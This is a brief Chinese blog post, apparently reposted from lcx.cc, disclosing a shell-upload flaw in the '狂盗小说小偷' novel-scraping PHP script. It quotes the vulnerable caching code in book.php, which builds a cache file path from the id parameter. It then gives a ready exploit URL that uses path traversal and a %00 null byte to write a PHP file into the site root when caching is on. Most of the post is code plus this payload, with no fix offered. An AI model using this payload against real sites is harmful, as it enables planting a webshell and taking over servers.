By:Cond0r
很傻比的一漏洞
必须开启缓存才能利用
先看代码
|
book.php:
$kd_cachedir = "./cache";
if($kd_book_cache=="ture"){//缓存必须开启
$lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
// echo $lastflesh;
if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60)
ob_start();
include "./templates/$kd_moban/book.html";
$mianfei = ob_get_contents();
ob_end_clean();
file_put_contents("./cache/book$shuid.html",$mianfei);
echo file_get_contents($kd_cachedir."/book$shuid.html");
}else{
echo file_get_contents("./cache/book$shuid.html");
}
}else{
include "./templates/$kd_moban/book.html";
}
?>
|
exp:http://1.com/book.php?id=/../../1.php%00“>
根目录:1.php
本地测试:
![狂盗小说小偷 GET Shell 漏洞]()
文章来源于lcx.cc:狂盗小说小偷 GET Shell 漏洞
相关推荐: 【公告】博客系统再次更新 添加了邮件提醒功能
邮件提醒功能 新的后台登陆界面 本次更新重要功能有: 1.后台的一点细节问题,更方便使用。 2.添加网站留言提醒功能,支持选择是否使用此功能。 3.修改后台登陆界面(自己设计的)。 首先修改了一点小细节的问题,不值一提(其实仅仅是一个超链接,改成了新建窗口打开…
评论